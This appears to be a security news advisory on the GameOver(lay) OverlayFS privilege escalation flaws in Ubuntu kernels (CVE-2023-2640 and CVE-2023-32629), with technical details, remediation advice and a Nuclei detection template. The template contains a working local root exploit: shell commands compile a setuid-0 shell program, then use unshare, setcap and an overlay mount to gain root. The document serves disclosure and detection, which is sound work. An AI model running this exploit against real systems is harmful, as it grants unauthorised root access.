GameOver(lay) encompasses two significant vulnerabilities within the Ubuntu kernel, CVE-2023-2640, and CVE-2023-32629, each carrying a high-severity rating with CVSS scores of 7.8. These vulnerabilities pose a critical threat, potentially affecting around 40% of Ubuntu users. The vulnerability lies within the OverlayFS module of the Ubuntu kernel, enabling a local attacker to execute a privilege escalation attack, granting unauthorized elevated access to the system.
Technical Details
CVE-2023-2640: This vulnerability emerges from specific configurations within Ubuntu kernels. It occurs when an Ubuntu kernel includes both c914c0e27eb0 and the UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs modifications. An unprivileged user gains the ability to set privileged extended attributes on files mounted via OverlayFS. These attributes are then improperly applied to the upper files, bypassing the necessary security checks. This creates a loophole where unprivileged users can perform actions they typically wouldn't have permission to perform.
CVE-2023-32629: This is a local privilege escalation vulnerability present in Ubuntu's OverlayFS. The flaw resides in the ovl_copy_up_meta_inode_data function of OverlayFS, which incorrectly skips permission checks when executing ovl_do_setxattr. The crux of this vulnerability is the potential for an attacker to craft a special executable file endowed with scoped file capabilities. When the Ubuntu Kernel is tricked into copying this file to a location with un-scoped capabilities, it inadvertently grants root-like privileges to any user who executes the file. This vulnerability allows a local attacker to escalate their privileges to the highest level, gaining unfettered access to the system.
Nuclei Template
id: CVE-2023-2640
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
id
- engine:
- sh
- bash
source: |
cd /tmp
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: andTimeline
The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure.
Remediation
Users are recommended to apply updates provided by Ubuntu to mitigate these vulnerabilities. Taking advantage of these vulnerabilities requires establishing a user namespace and an OverlayFS mount, hinting that attackers need local code execution capabilities on the targeted system, making remote exploitation unlikely.
References
Jul 27, 2023Newsroom
